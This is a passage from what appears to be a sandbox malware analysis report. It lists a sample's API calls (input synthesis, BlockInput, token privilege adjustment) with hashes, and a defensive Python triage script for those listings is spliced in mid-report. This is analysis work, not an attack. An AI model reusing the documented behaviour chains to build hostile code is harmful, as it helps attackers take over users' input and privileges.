                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
                        • Instruction ID: e45ce7ab6a5aa19628a51a1843cc86d454d5794d6c48a327555e8e5dc1c4697a
                        • Opcode Fuzzy Hash: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
                        • Instruction Fuzzy Hash: FDF0E5B06042282AE72067A69C4DFEB7AAEEFC5771F004165F609D2281DAA09944C7B0
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009EB25D
                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 009EB270
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
                        • Instruction ID: 4656370aaeb928d05c53b3271d23bc7dcc61ed9e660afb7f5f7ab733d2e0574d
                        • Opcode Fuzzy Hash: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
                        • Instruction Fuzzy Hash: 06F01D7184428DABDB06DFA1C805BEE7BB4FF04315F008409F965A5191C37986119F94
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
                        • CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
                        • Instruction ID: bc600462ddede7f26dc5211f32617790f7e57ce59a73cf112aecbc1ef7a94a20
                        • Opcode Fuzzy Hash: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
                        • Instruction Fuzzy Hash: 22E04F32004610AFEB256B55FC05FB3B7A9EB04320F20C82DF4A5804B1DB626C90DB10
                        Strings
                        • Variable is not of type 'Object'., xrefs: 009D0C40
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable is not of type 'Object'.
                        • API String ID: 0-1840281001
                        • Opcode ID: ca21b1c79e35ad56b0147c289d43725f5dd9dcf9ddf9c7c7fb485c925eb336e3
                        • Instruction ID: 237572a9824d55ab8fd4209d92c4b513b19f71347b284880e549e037fc4e3638
                        • Opcode Fuzzy Hash: ca21b1c79e35ad56b0147c289d43725f5dd9dcf9ddf9c7c7fb485c925eb336e3
                        • Instruction Fuzzy Hash: FD32ACB0900218DFDF14EF94D881BEDB7B9BF85308F14845AE806AB392D775AE45CB60
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009B6766,?,?,00000008,?,?,009BFEFE,00000000), ref: 009B6998
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
                        • Instruction ID: 95cbc31b8f97a5e5a2ce95d299399d563fc073a329adf00a9a7e75889ae99538
                        • Opcode Fuzzy Hash: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
                        • Instruction Fuzzy Hash: B9B14D32510608DFDB15CF28C586BA57BE0FF45364F298658E899CF2A2C739E991CB40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
                        • Instruction ID: a06bfc7cf025996b45e41b9cd067a3fd666539d06b60738a69a3b179495d4e68
                        • Opcode Fuzzy Hash: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
                        • Instruction Fuzzy Hash: C8126E759002299FCF24CF58D9817EEB7B9FF48710F14819AE849EB252DB349A81DF90
                        APIs
                        • BlockInput.USER32(00000001), ref: 009FEABD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
                        • Instruction ID: c27d842c3b6a84bfa84d5344db9792b03eb7ca354a9a61dbed5a025911bb38f2
                        • Opcode Fuzzy Hash: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
                        • Instruction Fuzzy Hash: 68E01A752002049FD710EF59D804E9ABBE9AF98760F008416FD49C7361DA70E8418BA0
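The function entries above (the AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple, SendInput with keybd_event, AdjustTokenPrivileges, and BlockInput) are the kind of API chains an analyst scans a report like this for. As an added example, not part of the Joe Sandbox report or its IDA plugin, the following Python script parses `APIs` lines in the format shown in those entries and triages them: it decodes the AllocateAndInitializeSid arguments (sub-authority count 2, 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS) to recognise the standard "is the caller in BUILTIN\Administrators" idiom, and flags BlockInput(TRUE) and the input-synthesis and privilege APIs. The line grammar in `API_LINE` is inferred from the visible entries and is an assumption; the sample input is a constructed string holding lines copied from those entries; the tag list is this example's own choice.

```python
import re
from dataclasses import dataclass

# Constructed sample: "APIs" lines copied from the function entries above,
# grouped the way the report groups them (one "APIs" header per function).
SAMPLE_ENTRIES = """
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009E168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E16A1
• FreeSid.ADVAPI32(?), ref: 009E16B1
APIs
• GetCurrentProcess.KERNEL32(009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D09
• TerminateProcess.KERNEL32(00000000,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D10
• ExitProcess.KERNEL32 ref: 009A4D22
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009EB25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 009EB270
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
• CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9
APIs
• BlockInput.USER32(00000001), ref: 009FEABD
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37F4
"""

# Assumed line grammar: "• Name.MODULE(arg,arg,...), ref: HEXADDR" (parentheses optional).
API_LINE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Well-known SID constants (winnt.h).
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220

# APIs worth a second look in a sample; tag text is this example's own wording.
TAGS = {
    "CheckTokenMembership": "token group membership check",
    "AdjustTokenPrivileges": "modifies token privileges",
    "SendInput": "synthesizes user input",
    "keybd_event": "synthesizes keystrokes",
    "BlockInput": "blocks keyboard and mouse input",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # raw tokens; "?" means unresolved at static-analysis time
    ref: int        # call-site address


def parse_entries(text):
    """Split the listing into function entries, each a list of ApiCall."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = m["args"].split(",") if m["args"] is not None else []
            current.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return entries


def hexarg(tok):
    """Decode one argument token; None for '?' or symbolic tokens like Function_xxx."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def is_admin_check(entry):
    """AllocateAndInitializeSid(auth, 2, 0x20, 0x220, ...) followed by
    CheckTokenMembership is the standard BUILTIN\\Administrators test."""
    names = [c.name for c in entry]
    if "AllocateAndInitializeSid" not in names or "CheckTokenMembership" not in names:
        return False
    a = next(c for c in entry if c.name == "AllocateAndInitializeSid").args
    return (len(a) >= 4 and hexarg(a[1]) == 2
            and hexarg(a[2]) == SECURITY_BUILTIN_DOMAIN_RID
            and hexarg(a[3]) == DOMAIN_ALIAS_RID_ADMINS)


def triage(text):
    """Return one finding per function entry that contains a tagged API."""
    findings = []
    for entry in parse_entries(text):
        names = [c.name for c in entry]
        tags = [TAGS[n] for n in names if n in TAGS]
        if is_admin_check(entry):
            tags.append("checks membership in BUILTIN\\Administrators")
        for c in entry:
            # BlockInput(TRUE) actually blocks input; BlockInput(FALSE) releases it.
            if c.name == "BlockInput" and c.args and hexarg(c.args[0]) == 1:
                tags.append("BlockInput(TRUE): input blocked while this code runs")
        if tags:
            findings.append({"ref": f"{entry[0].ref:08X}", "apis": names, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f["ref"], ", ".join(f["apis"]))
        for t in f["tags"]:
            print("   -", t)
```

The parser deliberately keeps `?` tokens as unresolved rather than guessing values, so the admin-SID match fires only when the count and both sub-authorities are concrete in the listing; applying the same script to a full report gives a per-function summary that can be cross-checked against the behaviour signatures at the top of the report.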
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009A03EE), ref: 009A09DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
                        • Instruction ID: b1f24d40c249058953428538a0e57ea5b9824cc859a9a90d66fa19601f6d79b7
                        • Opcode Fuzzy Hash: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
                        • Instruction Fuzzy Hash:
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction ID: 4557397f1efb42b266cd4e75690e0bde83ce5fee815add57a66017f868a4cc99
                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction Fuzzy Hash: 6A51356260C6056BDB3885EC8C9F7BFE78D9B83340F18091AD886D7282CA1DDE45D3D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
                        • Instruction ID: 7fa442219ddc8a2b4da4febef32f4ed9c3fa8bf28586446d6236d08d62a396ea
                        • Opcode Fuzzy Hash: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
                        • Instruction Fuzzy Hash: 15320122D29F014DD7339678C922335A68DAFB73E5F15D737F81AB59A9EB29C4834200
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
                        • Instruction ID: 88459ba00d6a3648fce73c032a4e7a023f214973bb79a20d6011e4f48eb7a1fd
                        • Opcode Fuzzy Hash: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
                        • Instruction Fuzzy Hash: D53205B2A801178BDF28CF68C89467D7BA9EB45301F28CD6BD489DB391E635DD81DB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 117b22718237947a9e529b3ba6fee703f1244e3c018ca4b97bf894b8a1ee2c5e
                        • Instruction ID: 3522f4bff94667dd9a3e30eafdcfb5f3aa1e1d49d2c6cfcabb02be104adb03e3
                        • Opcode Fuzzy Hash: 117b22718237947a9e529b3ba6fee703f1244e3c018ca4b97bf894b8a1ee2c5e
                        • Instruction Fuzzy Hash: BE227E70E0460ADBDF14DFA4C941BAEB7B6FF84300F244529E816A7391EB36E951CB51
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 893f53d723f51eb507bba1ac62b238cf20b9059d7eb69e0bdfadcb444da68041
                        • Instruction ID: aca6331fb5bab3d980870478c845fd1acdf14f666cde8fb26ec67455ec5de2da
                        • Opcode Fuzzy Hash: 893f53d723f51eb507bba1ac62b238cf20b9059d7eb69e0bdfadcb444da68041
                        • Instruction Fuzzy Hash: C30281B1E0020AEBDF04DF54D881BAEB7B5FF84300F148569E8169B391EB35AE51CB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                        • Instruction ID: 12ba86c54e4001be7f6d5b0b390a3f21670d8f6e383c4d21725ddafa5ba1ec42
                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                        • Instruction Fuzzy Hash: 0E9165722080E34ADB2D463E857403EFFE59A933B1B1A0B9ED4F2CA1C5FE24C954D660
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                        • Instruction ID: 5234610e07a2399ee0ccbdaf49f87d88c98fa870e1615e4f66c121673aab4538
                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                        • Instruction Fuzzy Hash: AA91B2322090A34EDB2D427A857403EFFF95A933B2B1A079ED4F2CA1C5FE24C564D660
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
                        • Instruction ID: 5c6e32b0d67c2296adee997b3da0d0a37a1788db8cff56a9c0338885234c5be5
                        • Opcode Fuzzy Hash: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
                        • Instruction Fuzzy Hash: 1E6139B160870966DE349AE88D97BBFF39CDF83710F140D19E882DB281DA159E4283E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
                        • Instruction ID: 3c99b57b3f95bed0b5b6c5b895ea2cc8f44e6e56dedb9b66cc106f53498fd4a3
                        • Opcode Fuzzy Hash: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
                        • Instruction Fuzzy Hash: 8F61783160870966DE384AE84C67BBFE39CEF83700F200D59E843CB2D1EA169D42C2D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                        • Instruction ID: 6be32cefebf9a669989ea5075a5c45744ac66d2ae5e5671281891e3d69e4563b
                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                        • Instruction Fuzzy Hash: B08187776090A30EDB6D423E853443EFFE55A933A1B1A079ED4F2CB1C1EE28C554E6A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 28faaae2de63921fc4042e38bf6027d19305efb22da0fdee222ebb10d162e6c1
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 1141C4B1D1051CEBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
